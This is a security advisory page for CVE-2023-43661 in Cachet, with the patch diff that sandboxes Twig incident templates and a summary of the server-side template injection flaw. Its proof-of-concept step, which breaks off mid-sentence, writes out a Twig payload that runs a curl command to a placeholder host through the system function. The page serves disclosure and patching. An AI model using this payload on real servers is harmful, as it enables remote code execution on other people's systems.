Headline
CVE-2023-43661: Merge pull request from GHSA-hv79-p62r-wg3p · cachethq/cachet@6fb043e
Cachet, the open-source status page system. Prior to the 2.4 branch, a template functionality which allows users to create templates allows them to execute any code on the server during the bad filtration and old twig version. Commit 6fb043e109d2a262ce3974e863c54e9e5f5e0587 of the 2.4 branch contains a patch for this issue.
Expand Up @@ -23,9 +23,12 @@ use CachetHQ\Cachet\Services\Dates\DateFactory; use Carbon\Carbon; use Illuminate\Contracts\Auth\Guard;
use Twig\Environment as Twig_Environment; use Twig\Loader\ArrayLoader as Twig_Loader_Array;
/** * This is the create incident command handler. * Expand All @@ -49,6 +52,8 @@ class CreateIncidentCommandHandler */ protected $dates;
protected $twigConfig;
/** * Create a new create incident command handler instance. * Expand All @@ -61,6 +66,8 @@ public function __construct(Guard $auth, DateFactory $dates) { $this->auth = $auth; $this->dates = $dates;
$this->twigConfig = config(“cachet.twig”); }
/** Expand Down Expand Up @@ -131,6 +138,34 @@ public function handle(CreateIncidentCommand $command) return $incident; }
protected function sandboxedTwigTemplateData(String $templateData) {
if (!$templateData) { return ""; }
$policy = new \Twig\Sandbox\SecurityPolicy($this->twigConfig[“tags”], $this->twigConfig[“filters”], $this->twigConfig[“methods”], $this->twigConfig[“props”], $this->twigConfig[“functions”]);
$sandbox = new \Twig\Extension\SandboxExtension($policy);
$templateBasicLoader = new Twig_Loader_Array([ ‘firstStageLoader’ => $templateData ]);
$sandBoxBasicLoader = new Twig_Loader_Array([ ‘secondStageLoader’ => ‘{% sandbox %}{% include “firstStageLoader” %} {% endsandbox %}’ ]);
$hardenedLoader = new \Twig\Loader\ChainLoader([$templateBasicLoader, $sandBoxBasicLoader]); $twig = new Twig_Environment($hardenedLoader); $twig->addExtension($sandbox); return $twig; }
/** * Compiles an incident template into an incident message. * Expand All @@ -141,8 +176,7 @@ public function handle(CreateIncidentCommand $command) */ protected function parseTemplate(IncidentTemplate $template, CreateIncidentCommand $command) { $env = new Twig_Environment(new Twig_Loader_Array([])); $template = $env->createTemplate($template->template); $template = $this->sandboxedTwigTemplateData($template->template);
$vars = array_merge($command->template_vars, [ ‘incident’ => [ Expand All @@ -157,7 +191,7 @@ protected function parseTemplate(IncidentTemplate $template, CreateIncidentComma ‘component_status’ => $command->component_status, ], ]);
return $template->render($vars); return $template->render('secondStageLoader’, $vars); } }
Related news
### Summary A template functionality which allows users to create templates allows them to execute any code on the server during the bad filtration and old twig version. Within `/cachet/app/Http/Routes/ApiRoutes.php`, and attacker could control `template` input which is passed to `laravel's` dispatched handler `/cachet/app/Bus/Handlers/Commands/Incident/CreateIncidentCommandHandler.php`. If an attacker is able to control this data, they may be able to trigger a server-side template injection vulnerability which can lead to remote code execution. This vulnerability does not exist within the [Twig](https://twig.symfony.com/) library itself, but exists during the process of the [Cachet](https://github.com/cachethq/cachet) processing of the data without any filtration. This has been patched in Cachet version 2.4. ### PoC 1. Log in as a default user (non-admin); 2. Create an incident with name `slug1` and with content: `{{ ['curl yourhost.com','']|sort('system') }}` or with any other ...